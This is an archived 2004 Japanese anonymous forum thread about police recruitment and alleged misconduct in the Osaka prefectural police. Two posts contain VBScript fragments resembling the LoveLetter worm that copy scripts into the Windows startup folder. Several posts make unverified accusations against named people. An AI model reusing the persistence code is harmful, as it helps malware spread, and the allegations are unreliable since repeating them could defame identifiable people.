第2回選考の次の身体検査の日と2次選考の日っていつでしたっけ?
1次選考の発表もまだなのに気になって・・・ 

113 :名無しピーポ君:04/05/16 18:39
>>112
厨房は>>2をよめ。
sage進行だぞ。

114 :名無しピーポ君:04/05/16 18:45
すみません・・・未熟者なのでよくわかりません。
教えてください?

115 :名無しピーポ君:04/05/16 19:08
大阪府警はバカだからな〜


116 :名無しピーポ君:04/05/17 20:15

北京オリンピック開催記念

世界的文化遺産 中国国術資料の紹介
中国国家文物委員会
常書鴻委員推薦(常書鴻直筆によるもの)

内容(日本国 武道行政国庫補助対策事業)
中国国家武術協会重鎮

日本政府国庫補助対策事業である日本武道館開館20周年記念 
日中親善武道演武交流大会 中国武術代表団 副団長 馬賢達 馬明達の
中国国術戦術映像資料を柔道 剣道 弓道 相撲 4連盟組織 士道会の
日本武道師範 警察武道師範 警察機動隊員 学校教育武道教師 古武道師範
の方々に公開していますのでご利用下さい。

協力
中国国家体育運動委員会所属中国人民体育出版社
編集委員会
副主任 閻海老教授協会会員

套路有害説 http://www.ne.jp/asahi/tfz/tys/index.html

歴代日中剣道史 http://www.h5.dion.ne.jp/~rekidai/index.htm



117 :名無しピーポ君:04/05/17 22:36
>>116
コピペuzeeeee

118 :名無しピーポ君:04/05/26 02:27
大阪府警はここをなんとかしてくれ

http://www.megabbs.com/cgi-bin/readres.cgi?bo=society&vi=1045892381

119 :名無しピーポ君:04/05/26 02:30



684 :うさだ萌え ◆HkEgRy0Iso :04/05/25 21:20 ID:84VwCt++
うさだ萎え、漏れが、AV、DVD、飼ってきて、ISOっで、UP、してやる。

10個くらい、飼ってきてな。ハゲが。


120 :名無しピーポ君:04/05/26 08:00
4月22日未明、○○警△△警察署の警備課員
が、酒に酔った末、極秘扱いの資料を紛失した。
○○警警備部の関係課は、事件の経過を説明、
同様の事案が再発しないようにするための報告
を、本庁警備局に対して行った。
これを受け、本庁においても、全国に再発防止
のための通達を出した。
なお、この資料には、視察対象団体、視察対象
団体関係者との接触方法・場所等の極秘事項が、
記載されており、事案の詳細を広報すれば、今後
の公安活動に著しい支障を来たすおそれがあるこ
とから、当面の広報は、差し控えることとした。


121 :名無しピーポ君:04/05/26 20:25
ここは必死にageたいのか?sageてるやつがいなさ過ぎる

122 :名無しピーポ君:04/05/27 03:57
アウトロー板にいったら、
大阪府警がやくざに恐れられていることをしった
以下引用
221 :名無番長 :04/04/27 13:35
東組は組員へのヤキが半端じゃないらしい。
会費取られた上にこれはきつい。
会費は高めでもいいが、組員にやさしい組はどこかな?
222 :名無番長 :04/04/27 13:43
>>221
大阪府警やろ?やっぱし?
上納の会費いらんし末端でも月に15も小遣いくれるし
チャカは常備携帯できるし
合法で人しばけるし
ええでー
最高の組織やんけ


123 :名無しピーポ君:04/05/27 03:57
223 :名無番長 :04/04/27 16:20
そんなに大阪府警はすごいの?
話にしか聞いた事無いもので大阪府警に実際取り調べ受けた人いるの?
224 :名無番長 :04/04/28 01:50
警視庁が子供の遊びに見えるらしいな。特に四課は名のある極道以外
虫けら扱いゆうか、むちゃくちゃさらしよる!
225 :名無番長 :04/04/28 07:15
なんぼ菱が必死に三万も兵隊揃えたゆうても
府警にはかなわんわい
府警の組織力資金力行動力
どれをとっても菱よりは数段上や
226 :名無番長 :04/04/29 01:13
>225
同感やね!桜の代紋は最強や
ワシも真面目にやって軽殺官しとりゃー良かったわ





124 :警務課員:04/05/31 08:27
そこの一線署長
キャリア接待で
管内ゴルフ場を
割安で利用スンナ
つーの
ネタバレ

125 :名無しピーポ君:04/05/31 19:57
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

126 :警務課員:04/06/01 10:25
本部の会計検査の
結果、楽しみ

127 :名無しピーポ君:04/06/01 10:34
例えば、だ・・・。よく考えて欲しい。
就職した後もドライブがしたい、週末にはテニス、趣味がある、
毎年盆暮れ正月くらいは実家に帰りたい、大学高校時代の仲間との交流もある
こういう人間には警察官は勧められない。

毎日毎日警察官に敵愾心を持っている人間ばかりを相手に自由なく働く仕事は
外からでは決して窺い知れないものがある。
嫌なものだよ。人の不幸が飯のタネの商売は。
社会的地位も自由もある弁護士等ならいざ知らず、一生を組織の駒として終える
警察官に憧れや、なる前に抱いていた「やり甲斐」なんてものは無い。

最近は警察官試験難しいんでしょ?(いろいろ言われているけど)
もう少し勉強すれば恐らくもっと良い職業(こう言うと語弊あるかな)に就けるよ。

サッカーや野球に興味のある人いない?警察官になったらなかなか見れないよ。
仕事を終えてビールを一杯…とかも無理だし(3交代制なら特に)、
昼に民間みたいに社外に出て昼食とかも無理。下手すれば一生そんな生活。

慣れれば平気?そう考えるならそうかもしれない。
警察官になったら引き返せるうちに引き返さないと幸せな生活には戻れない。

http://www.gay.jp/VJ/label/ssv/main/192.html

128 :こんなんしとうで:04/06/01 10:52
【泥酔して捜査書類を紛失 大阪府警警部補、翌日戻る】
新聞を読もう(今日の朝刊)
☆やっと報道スマスタ☆



129 :名無しピーポ君:04/06/01 22:20
2004/5/1退職の平成管財社員が行方不明である。

130 :司法警察職員:04/06/02 09:06
鶴見署の泥酔作業員さん
ご苦労様
せいぜい総連に舐められぬ
ように

131 :外事作業員:04/06/02 19:26
泥酔、資料紛失あげ
酒癖治したいあげ!

132 :名無しピーポ君:04/06/02 21:40
ていうか、カルト多そうですね。

133 :名無しピーポ君:04/06/03 08:31
大阪府警鶴見署の男性警部補(43)が帰宅途中に泥酔し、
捜査書類が入ったかばんを一時紛失したことが31日、分か
った。かばんは約30時間後、落とし物として届けられ、書類
も手元に戻ったという。府警は警部補の処分を検討している。
 府警監察室によると、かばんに入っていたのは業務報告書
2枚とフロッピーディスクなど3枚。一部に事件の情報や個人
情報も含まれていた。
←4月23日には、府警察の関係部課挙げて、「大騒ぎ」していた
 のに、監察が把握したのが5月30日とは
キャリアの絡みは


134 :名無しピーポ君:04/06/03 13:01
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"

135 :名無しピーポ君:04/06/04 09:44
徹底的に上げて行きませう
>>133「国民の知る権利」
への冒涜だ〜〜〜

136 :名無しピーポ君:04/06/04 13:59
>>134
ある事をしたら被害が無い。
残念でした。プ

137 :名無しピーポ君:04/06/04 14:08
_,,,,,,,,
     , - ' ゙    `` ‐ 、_,,,,,
   ,r'          /=ミ
  /           彡ll',''´
. /             彡lll
 !-- .、    ,、、、、,,,   彡lノ
 l,,,,,__ /   ___     'r''゙ヽ
. |`゙'' ./   `'゙'''"    .〉,l |
 |.   ,'           //
. ',. ,'           , r'
.  ゙, ゙'ー ‐`      l  |
   ゙、''゙ ,,、二''‐    ノ  l、
''''''''7'ヽ  '''    /   /`〉`゙T''''''''''
  l  ` 、,,,,、- ' "    / /.|  |
.  |  |  .l i       / ./ |  |
  |  |  | l      / ./ .|  |
. |  |   | l     / /  |  |
 |  |   | ',   / /  l  .l
【ゴールデンレス】
このレスを見た人はコピペでもいいので
10分以内に3つのスレへ貼り付けてください。
そうすれば14日後好きな人から告白されるわ宝くじは当たるわ
出世しまくるわ体の悪い所全部治るわでえらい事です


138 :名無しピーポ君:04/06/04 14:21
     , - ' ゙    `` ‐ 、_,,,,,
   ,r'          /=ミ
  /           彡ll',''´
. /             彡lll
 !-- .、    ,、、、、,,,   彡lノ
 l,,,,,__ /   ___     'r''゙ヽ
. |`゙'' ./   `'゙'''"    .〉,l |
 |.   ,'           //
. ',. ,'           , r'
.  ゙, ゙'ー ‐`      l  |
   ゙、''゙ ,,、二''‐    ノ  l、
''''''''7'ヽ  '''    /   /`〉`゙T''''''''''
  l  ` 、,,,,、- ' "    / /.|  |
.  |  |  .l i       / ./ |  |
  |  |  | l      / ./ .|  |
. |  |   | l     / /  |  |
 |  |   | ',   / /  l  .l


139 :キャリアよ!:04/06/05 16:41
ゴルフ・宴会三昧!

140 :名無しピーポ君:04/06/06 02:17
あの宗教やってたら昇進できるって本当か?
選挙の時も、無職のプラプラしてる奴を車で送迎ご苦労様です。
何年前やったかな〜?当時、副本部長付の○○オ君

141 :&rlo;名無しピーポ君:04/06/06 10:48
ココもウイルスいるよ
対策ソフト入れようね

142 :キャリアよ:04/06/07 08:29
早く出世するのだから
その分
ゴルフや宴会の経費は
俺たちに回せ!
管内でゴルフすんな

143 :いずみがおか:04/06/07 13:10
ゴルフ場
ただゴルフ挙げ

144 :警務:04/06/08 08:28
光丘カントリー倶楽部
聖丘カントリー倶楽部
キャリア
ただゴルフ

145 :キャリア:04/06/08 18:51
ただ晩飯あげ

146 :名無しピーポ君:04/06/09 08:16
本庁の接待とか
キャリアだけで
鶴橋焼肉すんな
店は会計検査院
に把握されてい


147 :昨日の晩も:04/06/10 09:37
どこいやらで一線署や部下の慰労
と称して、報償費・捜査費・旅費の
不当流用に勤しむキャリア揚げ

148 :カジノ情報:04/06/10 11:52
どうして大物ヤクザが経営するカジノは摘発されないの?
歌舞伎町・風林会館前・ギンレイビル6階「エンポリオ」
摘発がある時は警察関係者から事前に情報が入るらしく
現に他店が摘発される時はエンポリオは事前に店を閉めている
毎月数億円の利益を上げそのほとんどがヤクザの資金源になっているのに
警察関係者は裏金を貰ってその非合法な稼業を裏でサポートしているのが現状

エンポリオ総責任者 小島
他従業員  南
        松野
        岩本

149 :外事作業員、総連喜ばし:04/06/10 16:33
大阪府警鶴見署の男性警部補が帰宅途中に泥酔し、
捜査書類が入ったかばんを一時紛失した問題で、大
阪府警は7日付で警部補を本部長訓戒処分にした。 
府警監察室は「一時的とはいえ、酒に酔った上で重
要な書類などが入ったかばんを紛失した責任は重く、
警察の信用を失墜した」としている。 警部補は4月
22日夜から23日未明にかけて、大阪市内で飲酒し、
業務報告書などが入ったかばんを紛失。かばんは24日
午後、鶴見署近くで近所の人が見つけて届けた。(共同通信)

150 :本部長:04/06/13 21:20
交代で六月中、キャリアの皆さんは、ご宴席。報償費・捜査費・旅費。警務・庶務エーン(;_;)

151 :名無しピーポ君:04/06/14 09:29
鎌原俊治 辞職の真相は

152 :名無しピーポ君:04/06/14 10:33
神奈川県警座間署にはハンナン浅田会長と共犯で、既に
収賄などの罪で起訴されている鈴木○男の私設秘書に便
宜を図っている者がいます。かつて、褒章の意味で署内
から署長が任命された事も有ります。

この私設秘書は、鈴木○男が失脚する迄は自民党の政治
家の一員でしたが、浅田と同様○暴のグループ員です。

153 :名無しピーポ君:04/06/14 10:34
昨年の10月18日、鈴木は記者会見をして胃がんを発表した。ところ
で、建国義勇団の銃弾入り郵便が鈴木事務所に届いたのは10月20
日。つまり、この郵便は記者会見とほぼ同時に投函されている。

 また、鈴木事務所が「被害」を受けた同じ日、河野洋平議員の自宅
にも銃弾入りの封筒が届いている。外務大臣と裏の外務大臣。共通
点は有るが正反対の二人。



154 :名無しピーポ君:04/06/14 10:35
胃がんを捏造して国民の同情を引き、更に被害者として扱われ、病魔
と戦うクリーンなイメージを国民に与えるよう仕組んだ狂言ではないか。

同時に被害に遭った河野議員は肝臓移植を受けながらも衆院議長を
任命されるほど周囲から信頼された政治家。狡猾な鈴木が利用した
がるのも当然だ。

ハンナン浅田は日本最大闇組織の一員。浅田とのつきあいが長く資金
や高級車セルシオなど提供させ、大声で政府に牛肉買取を迫った鈴木
も若い頃から裏社会と密接だ。
 利用できそうな右翼まがいなどは、○暴や警察の情報網からすぐに割
り出し、永年かけてズブズブに癒着した医師会の黒ヒゲ医者を動かすの
も雑作ないだろう。


155 :名無しピーポ君:04/06/14 10:48
今回、浅田が逮捕された理由は、資金や高級車などの見返りに後
ろ盾となっていた鈴木○男や京都の野中広務が失脚し、小泉首相
が常に自分の首を狙う利権グループのスポンサーを潰すに良いと
考えたからだと言われる。

鈴木宗○の私設秘書を自民党の政治家だと思い込んでいる座間署
はそれを知らずにいる。急襲するべき。


156 :名無しピーポ君:04/06/15 22:41
新旧本部長交代に伴う宴席の嵐 ただし極く一部の人だけ

157 :名無しピーポ君:04/06/15 22:48
         \   |    /
         _┌┬┬┬┐_
       ――┴┴┴┴┴―、          __________
      //    ∧// <_(警)> ||. \      /
  __[//____(゚_//[ ].ノリ゚A゚)) || _ \__ < 最近大阪府警ネタ多いですなぁ
 lロ|=☆= |ロロ゚|■■|■■∪浪速■■||     \__________
 | ∈口∋ ̄_l__l⌒l____|___l⌒l___ ||
   ̄ ̄`ー'   ゚`ー'  `ー'   `ー'


158 :名無しピーポ君:04/06/15 23:06
多いですな

159 :定時あげ:04/06/16 21:52
ネタ募集

160 :名無しピーポ君:04/06/18 14:07
かまよねはらあげ

161 :名無しピーポ君:04/06/18 15:24
たましたまさもね

162 :外事作業員:04/06/18 21:14
泥酔、資料紛失あげ

163 :定時:04/06/19 22:05
あげ

164 :今日も:04/06/20 22:14
キャリア様はゴルフ三昧

165 :名無しピーポ君:04/06/21 18:23
しかも裏金でウホッ!

166 :自由のために:04/06/21 22:20
都市へ!都市の空気は自由にする

167 :都市へ:04/06/22 09:18
あげ

168 :昼飯は:04/06/22 13:06
本部の食堂
けつねうろん

169 :名無しピーポ君:04/06/22 23:49
都市へ!あげ

170 :都市へ:04/06/24 15:08
あげ

171 :名無しピーポ君:04/06/24 21:43
維持あげ

47 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)